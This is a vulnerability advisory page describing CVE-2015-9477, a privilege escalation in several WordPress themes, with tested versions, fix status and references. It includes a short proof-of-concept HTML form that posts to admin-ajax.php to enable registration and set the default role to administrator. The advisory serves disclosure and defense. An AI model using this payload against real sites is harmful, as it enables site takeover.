Multiple Themes – Privilige Escalation | CVE 2015-9477 | Theme Vulnerabilities

Description

The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking.

An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on the server and taking over the website.

Tested Versions:

Simpolio 1.3.2
Pont 1.5
Teardrop 1.8.1
Vernissage 1.2.8

Proof of Concept

<form action="http://example.com/wp-admin/admin-ajax.php?action=of_ajax_post_action" method="post" >
	<input name="type" value="save" type="hidden" />
	<input name="data[users_can_register]" value="1" type="hidden" />
	<input name="data[default_role]" value="administrator" type="hidden" />
	<input type="submit" >
</form>

Affects Themes

No known fix

No known fix

No known fix

Fixed in 1.3

References

CVE

CVE

CVE

CVE

URL

https://web.archive.org/web/20150914160724/https://research.evex.pw/?vuln=17

URL

https://themeforest.net/item/vernissage-responsive-photographyportfolio-theme/4436204

Miscellaneous

Submitter

A. Samman

Submitter twitter

Verified

No

WPVDB ID

c04fb575-81df-47b6-90fb-ac6ca43c720b

Timeline

Publicly Published

2015-06-26 (about 10 years ago)

Added

2015-06-26 (about 10 years ago)

Last Updated

2020-12-09 (about 5 years ago)

Other

Published

Title

Published

2022-05-30

Title

Very Simple Contact Form < 11.6 - Captcha bypass

Published

2024-12-23

Title

Advanced Google reCAPTCHA < 1.26 - Brute Force Protection IP Unblock

Published

2015-06-10

Title

Paypal Currencucy Converter Basic For Woocommerce <= 1.3 - File Read

Published

2018-10-02

Title

Wordfence < 7.1.14 - Username Enumeration Prevention Bypass

Published

2021-11-30

Title

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS